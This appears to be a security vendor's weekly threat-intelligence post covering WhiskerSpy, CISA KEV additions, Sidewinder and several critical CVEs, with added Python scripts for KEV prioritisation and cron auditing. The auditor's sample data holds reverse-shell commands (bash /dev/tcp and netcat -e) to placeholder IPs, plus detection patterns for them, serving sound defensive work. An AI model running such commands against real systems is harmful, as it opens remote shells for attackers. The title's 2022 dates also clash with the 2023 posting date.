CSW's Threat Intelligence - February 20, 2022 - February 24, 2022
Posted on Feb 20, 2023 | Updated on Feb 24, 2023 | By Supriya Aluri
This edition brings you early warnings, trending news about cyber threats, and the accurate threat context. Check out which threat group is on the rampage, what vulnerability it could soon weaponize, and more.
Why play catch up when you can fix this now?
- Earth Kitsune Uses New Malware, WhiskerSpy
- CISA Added 3 New Vulnerabilities to the KEV Catalog
- Indian APT Group Sidewinder Targets Educational Institutions
Vulnerabilities to Watch Out For
- CVE-2022-39952 and CVE-2021-42756: Critical Flaws in Fortinet
- CVE-2023-20858: Critical VMware Vulnerability
- Critical Vulnerabilities in Apple OS
- CVE-2022-36537: Vulnerability in R1Soft Server Backup Manager
Earth Kitsune Uses New Malware, WhiskerSpy
Earth Kitsune is a new threat actor known for targeting North Korean entities. In a recent campaign, researchers found that the group is using a new backdoor known as WhiskerSpy. The malware was delivered to victims' devices when they tried to watch videos on a malicious website: the attacker compromised the website and injected a malicious script that prompted the victim to install a video codec for the media to play. This tactic is known as a watering hole attack. WhiskerSpy can perform a number of actions, including opening an interactive shell, downloading, uploading, deleting and listing files, taking screenshots, loading an executable and calling its export, and injecting shellcode into a process.
CISA Added 3 New Vulnerabilities to the KEV Catalog
On February 22, 2023, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2022-47986, CVE-2022-41223, and CVE-2022-40765 to the Known Exploitable Vulnerabilities catalog.
CVE-2022-47986 is the IBM Aspera Faspex remote code execution vulnerability that could allow a remote attacker to execute arbitrary code in a compromised system. There is evidence that this vulnerability is actively exploited in the wild, especially after a proof of concept for the exploit was released.
We warned our customers regarding this vulnerability in last week’s threat intelligence blog.
CVE-2022-41223 and CVE-2022-40765 impact Mitel's MiVoice Connect product. These code and command injection vulnerabilities allow an authenticated attacker with internal network access to execute arbitrary code. Mitel patched these vulnerabilities in October 2022, but they are still being targeted by attackers.
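To act on a KEV addition like this one, a defender wants to match scanner findings against the catalog and order remediation by CISA's due date. The Python script below is an added example, not code from CSW or CISA; the JSON mimics the field names of the KEV feed, but its entries, hosts and dates are constructed placeholders, and in practice the feed would be fetched from CISA's published JSON.

```python
import json
from datetime import date

# Constructed sample in the shape of CISA's KEV JSON feed (field names follow the
# real feed; the entries and dates here are illustrative, not the live catalog).
SAMPLE_KEV_JSON = """{"vulnerabilities": [
 {"cveID": "CVE-2022-47986", "vendorProject": "IBM", "product": "Aspera Faspex",
  "dateAdded": "2023-02-22", "dueDate": "2023-03-15"},
 {"cveID": "CVE-2022-41223", "vendorProject": "Mitel", "product": "MiVoice Connect",
  "dateAdded": "2023-02-22", "dueDate": "2023-03-15"},
 {"cveID": "CVE-2022-40765", "vendorProject": "Mitel", "product": "MiVoice Connect",
  "dateAdded": "2023-02-22", "dueDate": "2023-03-15"}
]}"""

# Constructed asset inventory: (hostname, CVE reported by a scanner).
SAMPLE_FINDINGS = [
    ("ftp-gw-01", "CVE-2022-47986"),
    ("pbx-01", "CVE-2022-41223"),
    ("pbx-01", "CVE-2022-40765"),
    ("web-03", "CVE-2021-42756"),   # not in the sample catalog
]

def load_kev(text):
    """Index the KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}

def prioritize(findings, kev, today_iso):
    """Rank findings: KEV entries first (soonest due date first), the rest after.
    Each row records whether the CVE is in KEV and the days left until due."""
    today = date.fromisoformat(today_iso)
    rows = []
    for host, cve in findings:
        entry = kev.get(cve)
        if entry is None:
            rows.append({"host": host, "cve": cve, "in_kev": False,
                         "due": None, "days_left": None})
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append({"host": host, "cve": cve, "in_kev": True,
                     "due": due, "days_left": (due - today).days})
    # KEV rows sort before non-KEV rows; within KEV, the earliest due date wins.
    rows.sort(key=lambda r: (not r["in_kev"], r["due"] or date.max))
    return rows

def overdue(rows):
    """Hosts still carrying a KEV entry past its remediation due date."""
    return sorted({r["host"] for r in rows if r["in_kev"] and r["days_left"] < 0})

if __name__ == "__main__":
    for r in prioritize(SAMPLE_FINDINGS, load_kev(SAMPLE_KEV_JSON), "2023-02-24"):
        print(r)
```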
Indian APT Group Sidewinder Targets Educational Institutions
Sidewinder (AKA Rattlesnake) is an Indian APT group that has been active since 2012. It carries out cyber espionage campaigns in Asian countries such as China, Pakistan, and Bangladesh. In a recent attack, the group targeted Chinese scientific research universities and institutions using phishing emails with malicious attachments. It has also used template injection to deliver malicious documents and has launched attacks on the Pakistani government, military and other units. The group is suspected of delivering trojans with every download to carry out follow-on attacks. To gain initial access, Sidewinder has exploited CVE-2017-11882, a Microsoft Office memory corruption vulnerability that has over 1500 exploits and is associated with 8 ransomware strains.
CVE-2017-11882 at a glance:
- CWE ID: CWE-119
- Exploit Type: RCE, PE, WebApp
- Affected Product Count: 4
- APT Associations: Swede, Lone Wolf, and 21 others
- Ransomware Associations: Zemblax, Fake Globe, and 6 others
Vulnerabilities to Watch Out For
CVE-2022-39952 and CVE-2021-42756: Critical Flaws in Fortinet
Fortinet fixed two critical remote code execution flaws in its products.
CVE-2022-39952 affects FortiNAC and has a critical CVSS score of 9.8. An external control of file name or path vulnerability [CWE-73] in the FortiNAC web server may allow an unauthenticated attacker to perform an arbitrary file write on the system.
Update: Threat actors are actively exploiting CVE-2022-39952 against Internet-exposed Fortinet appliances. After gaining initial access, they have been observed using cron jobs to open reverse shells to attacker-controlled IP addresses.
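A defender's check for the persistence mechanism described above: the Python script below is an added example, not code from the page or from Fortinet, that audits cron tables for commands matching common reverse-shell signatures and flags the every-minute schedule that such jobs tend to use. The cron entries and IP addresses are constructed samples, not observed indicators.

```python
import re

# Constructed cron tables for illustration (not captured from a real appliance):
# (path, contents, has_user_field). System tables under /etc carry a user column.
SAMPLE_CRON = [
    ("/etc/cron.d/sysupdate",
     "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.7/4444 0>&1'\n", True),
    ("/etc/cron.d/logrotate",
     "0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n", True),
    ("/var/spool/cron/crontabs/root",
     "# m h dom mon dow command\nMAILTO=''\n*/10 * * * * nc 203.0.113.9 4444 -e /bin/sh\n", False),
]

# Signatures typical of cron-based reverse-shell persistence, matched against the
# command portion of each entry.
INDICATORS = [
    ("bash-devtcp", re.compile(r"/dev/(tcp|udp)/")),
    ("interactive-shell", re.compile(r"\b(ba)?sh\s+-i\b")),
    ("netcat-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("decoded-payload", re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")),
]
# Five schedule fields (or an @shortcut) followed by the rest of the line.
SCHEDULE = re.compile(r"^((?:\S+\s+){5}|@\w+\s+)(?P<rest>.*)$")

def audit_crontab(path, text, has_user_field):
    """Return one finding per cron entry whose command matches an indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # comments and environment assignments are not jobs
        m = SCHEDULE.match(line)
        if not m:
            continue
        schedule, command = m.group(1).strip(), m.group("rest")
        if has_user_field:
            command = command.split(None, 1)[1] if " " in command else ""
        hits = [label for label, pat in INDICATORS if pat.search(command)]
        if hits:
            if schedule == "* * * * *":
                hits.append("every-minute")  # aggressive reconnect cadence
            findings.append({"file": path, "line": lineno,
                             "command": command, "indicators": hits})
    return findings

def audit_all(tables):
    return [f for path, text, sysflag in tables for f in audit_crontab(path, text, sysflag)]

if __name__ == "__main__":
    for f in audit_all(SAMPLE_CRON):
        print(f"{f['file']}:{f['line']} {f['indicators']} -> {f['command']}")
```

On a live host, feed the function the contents of /etc/crontab, /etc/cron.d/* and each user's spool file; a hit on a file that no package or change ticket accounts for is the signal to investigate.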
CVE-2021-42756 affects FortiWeb and has a CVSS score of 9.3. Multiple stack-based buffer overflow vulnerabilities [CWE-121] in FortiWeb's proxy daemon may allow an unauthenticated remote attacker to achieve arbitrary code execution via specially crafted HTTP requests.
CVE-2023-20858: Critical VMware Vulnerability
CVE-2023-20858 is a vulnerability in VMware's Carbon Black App Control product with a CVSS score of 9.1. An authenticated threat actor with access to the App Control administration console may be able to use specially crafted input to gain access to the underlying server operating system. VMware released a security advisory for this vulnerability and urged users to update to versions 8.7.8, 8.8.6, and 8.9.4 to mitigate the risk.
Critical Vulnerabilities in Apple OS
CVE-2023-23530, CVE-2023-23531, and CVE-2023-23520 were recently disclosed by Apple in a security advisory.
CVE-2023-23520 is due to a race condition in the Crash Reporter component. If exploited, it could enable a malicious actor to read arbitrary files as root.
CVE-2023-23530 and CVE-2023-23531 are present in the Foundation framework. They could allow an attacker to remotely execute code on the compromised device.
All three are classified as medium severity vulnerabilities.
CVE-2022-36537: Vulnerability in R1Soft Server Backup Manager
CVE-2022-36537 is being actively exploited to deploy backdoors. It is a vulnerability in the ZK Java Framework that R1Soft Server Backup Manager uses. An attacker can exploit it to bypass authentication and even remotely execute code on the R1Soft server software and its connected backup agents. In one recent attack, researchers discovered that the vulnerability was used to gain initial access and drop a malicious JDBC driver; this driver can load new functionality in memory and execute commands. ZK released a security advisory for this vulnerability and recommends that users patch it as soon as possible.
Check out this section to track how these threats evolve!
We use our threat intelligence platform driven by Artificial Intelligence (AI) and Machine Learning (ML) models to analyze the vulnerabilities that hackers could potentially exploit. We warn our customers continuously about exposures and prioritize vulnerabilities to facilitate rapid remediation.
Follow our weekly blog and podcast to get proactive alerts on trending threats. Reach out to us if you need help managing your vulnerabilities and exposures.
Leverage our expertise and manage your threats continuously to stay safe from attackers.
Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!